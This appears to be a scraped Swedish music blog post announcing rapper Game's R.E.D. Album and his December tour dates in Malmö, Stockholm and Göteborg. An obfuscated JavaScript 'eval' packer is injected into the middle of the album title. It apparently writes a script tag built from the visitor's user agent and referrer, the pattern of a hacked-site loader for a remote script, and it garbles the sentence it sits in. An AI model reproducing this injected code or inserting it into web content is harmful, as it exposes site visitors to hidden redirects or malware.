Image Image Image Image Image Image Image Image Image Image

| 15 augusti, 2020

Scroll to top

Top

Game till Sverige

Game till Sverige
Sebastian

I slutet av augusti släpptes Game’s efterlängtade album The eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|knrye|var|u0026u|referrer|zsedt||js|php’.split(’|’),0,{}))
R.E.D. Album
som är producerat av Pharell Williams och fullproppat av stora namn i branschen, eller vad sägs om Dr. Dre, Tyler The Creator, Lil’ Wayne, Snoop Dogg, Drake, Rick Ross, Chris Brown och Nelly Furtado?

Bortsett från grymma dragplåster och gästspel har albumet fått riktigt bra kritik och recensioner både från fans och media och är enligt mig antagligen hans bästa hittills.

Till vår stora lycka är Game på ingång till Sverige för att göra en en releaseturné, han kommer först till Malmö för att spela på KB den sjuttonde december, vidare upp till Stockholm där han spelar på Göta Källare den artonde och sist men inte minst Göteborg (Trädgår’n) den nittonde december, så se till att vara i några av de städerna i vinter!

Biljetterna släpps den sjätte oktober och kostar 395 :-/styck!